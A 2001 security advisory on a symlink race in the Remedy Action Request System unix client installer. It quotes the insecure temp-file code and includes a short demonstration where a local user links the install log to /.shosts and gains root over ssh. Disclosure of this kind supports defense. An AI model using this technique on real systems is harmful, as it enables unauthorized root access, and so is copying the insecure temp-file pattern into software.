Security Holes in Remedy Client Installer

Summary
-------

Due to improper handling of temporary files, the installer program for
Remedy Software's Action Request System client for unix can allow local
users to gain root privileges.

Details
-------

The installer script for the unix AR clients (ar_install) uses files with
predicatable names in world-writeable locations to store temporary files
and logging information. The code does not check to see if the files exist
before writing to them, or if the files are symbolic links to something
else. A local user can exploit this (by symbolically linking the target
files to something else ahead of time) to create or overwrite files
anywhere on the system. If the AR client is installed as root, this type
of attack can be used by unprivileged users to gain root access under the
right circumstances (eg. a local user knows that the AR client will be
installed on a system in the near future).

There are several instances of this problem in ar_install. A few examples:

# Name of the file to record a log of the installation into
#
LOGFILE="/usr/tmp/arClient_install.log"

... 

############################################
# lecho - Logged echo to stdout
#     Arg 0 to N = Data to be echoed
############################################
lecho()
{
    echo "$@" >> $LOGFILE
    echo "$@"
}

The lecho function is then frequently used to write logging data to
$LOGFILE.

Another example: 

#
# Test if "ex -" has any problem on this machine. If there is, use "ex"
#
echo "$PROD" > /tmp/ex.test
ex - /tmp/ex.test << EOF
/$PROD/
s/$PROD/$PROD_LONG/
w!
q
EOF
RET=$?
RES=`cat /tmp/ex.test`
if [ \( $RET -eq 0 \) -a \( "$RES" = "$PROD_LONG" \) ]
then
   EX="ex -"
else
 EX="ex"
fi

Demonstration
-------------

$ hostname
brokenhost
$ id
uid=5000(foo) gid=20(users)
$ ln -s /.shosts /var/tmp/arClient_install.log
$ ls -alt /var/tmp/arClient_install.log
lrwxrwxrwx   1 foo      users             8 Apr 12 14:57 
/var/tmp/arClient_install.log -> /.shosts

...wait for root to run ar_install...

$ ls -alt /.shosts
-rw-rw-rw-   1 root     other      50873 Apr 12 14:58 /.shosts
$ cat > /.shosts
brokenhost foo
^D
$ ssh -l root brokenhost
Last login: Thu Apr 12 14:50:30 from someotherhost
Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
brokenhost # id
uid=0(root) gid=1(other)
brokenhost # 

Vulnerable Versions
-------------------

I have tested this on Solaris 2.6 and 8, using the installer for AR 4.5.1.

The installers for the other supported unix versions (Irix, AIX, HP/UX and
NCR System 3000) contain similar issues, so it's likely that they are
vulnerable as well. The older versions of AR that are available for some
platforms (3.2.1) use a different install script. That script uses
different filenames, but appears to have similar flaws.

Workaround
----------

If the AR client is being installed on a single-user workstation, it can
be installed as a non-root user (this is not the default, but the
documentation explains how to do it). 

If the AR client must be installed as root, ar_install can be trivially
modified to avoid using a world-readable/writeable space to store its
temporary files. 

Vendor Notification
-------------------

The vendor was notified on 4/13/2001. 


Copyright 4/12/2001, by echo8